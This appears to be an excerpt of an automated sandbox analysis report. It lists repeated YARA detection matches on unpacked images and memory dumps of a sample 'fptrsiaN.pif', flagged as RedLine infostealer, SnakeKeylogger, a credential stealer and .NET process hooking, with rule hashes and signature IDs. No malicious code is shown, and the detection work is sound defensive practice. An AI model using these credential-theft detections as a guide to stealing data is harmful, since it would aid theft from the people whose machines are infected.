Source: 10.2.fptrsiaN.pif.242d0000.4.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 10.2.fptrsiaN.pif.242d0000.4.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 10.1.fptrsiaN.pif.400000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 10.3.fptrsiaN.pif.1ffcda28.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 10.3.fptrsiaN.pif.1ffcda28.0.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 10.3.fptrsiaN.pif.1ffcda28.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 10.2.fptrsiaN.pif.400000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 6.2.fptrsiaN.pif.1f6e0000.3.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 6.2.fptrsiaN.pif.1f6e0000.3.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 6.2.fptrsiaN.pif.1f6e0000.3.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 9.2.Naisrtpf.PIF.21107948.1.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 6.2.fptrsiaN.pif.1f6e0f08.4.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 6.2.fptrsiaN.pif.1f6e0f08.4.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 6.2.fptrsiaN.pif.1f6e0f08.4.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 15.2.fptrsiaN.pif.30c09d46.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 15.2.fptrsiaN.pif.30c09d46.1.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 15.2.fptrsiaN.pif.30c09d46.1.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 15.2.fptrsiaN.pif.335a0000.4.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 15.2.fptrsiaN.pif.335a0000.4.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 15.2.fptrsiaN.pif.335a0000.4.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 10.2.fptrsiaN.pif.24330000.5.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 10.2.fptrsiaN.pif.24330000.5.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 10.2.fptrsiaN.pif.24330000.5.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 15.2.fptrsiaN.pif.335a0f08.3.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 15.2.fptrsiaN.pif.335a0f08.3.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 15.2.fptrsiaN.pif.335a0f08.3.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 10.2.fptrsiaN.pif.21b5ac4e.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 10.2.fptrsiaN.pif.21b5ac4e.1.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 10.1.fptrsiaN.pif.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 15.2.fptrsiaN.pif.30c0ac4e.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 10.2.fptrsiaN.pif.242d0f08.3.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 10.2.fptrsiaN.pif.242d0f08.3.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 10.2.fptrsiaN.pif.242d0f08.3.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 15.2.fptrsiaN.pif.30c0ac4e.2.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 10.3.fptrsiaN.pif.1ffcda28.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 10.3.fptrsiaN.pif.1ffcda28.0.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 10.2.fptrsiaN.pif.21b5ac4e.1.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 6.2.fptrsiaN.pif.1f6e0000.3.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 6.2.fptrsiaN.pif.1f6e0000.3.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 6.2.fptrsiaN.pif.1f6e0000.3.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 15.2.fptrsiaN.pif.30c0ac4e.2.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 10.3.fptrsiaN.pif.1ffcda28.0.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 10.2.fptrsiaN.pif.21b59d46.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 10.2.fptrsiaN.pif.21b59d46.2.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 10.2.fptrsiaN.pif.21b59d46.2.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 15.3.fptrsiaN.pif.2f0fd950.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 15.3.fptrsiaN.pif.2f0fd950.0.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 15.3.fptrsiaN.pif.2f0fd950.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 15.2.fptrsiaN.pif.30c09d46.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 15.2.fptrsiaN.pif.30c09d46.1.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 15.2.fptrsiaN.pif.30c09d46.1.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 6.2.fptrsiaN.pif.1ce5ac4e.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 6.2.fptrsiaN.pif.1ce5ac4e.1.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 6.2.fptrsiaN.pif.1ce5ac4e.1.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 15.3.fptrsiaN.pif.2f0fd950.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 15.3.fptrsiaN.pif.2f0fd950.0.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 15.3.fptrsiaN.pif.2f0fd950.0.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 0000000A.00000001.1837489352.0000000000400000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 00000006.00000002.3009855324.000000001F6E0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 00000006.00000002.3009855324.000000001F6E0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000006.00000002.3009855324.000000001F6E0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 0000000A.00000002.3012271935.00000000242D0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0000000A.00000002.3012271935.00000000242D0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0000000A.00000002.3012271935.00000000242D0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 00000006.00000003.1724265899.000000001B2EC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0000000A.00000002.3000473987.0000000021B19000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0000000F.00000003.1916140937.000000002F0FD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0000000F.00000002.3012935219.0000000033BF0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0000000F.00000002.3012935219.0000000033BF0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0000000F.00000002.3012935219.0000000033BF0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 0000000A.00000003.1840988876.000000001FFCD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 00000006.00000002.2971941444.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 0000000F.00000001.1912204476.0000000000400000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 0000000F.00000002.2971881656.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
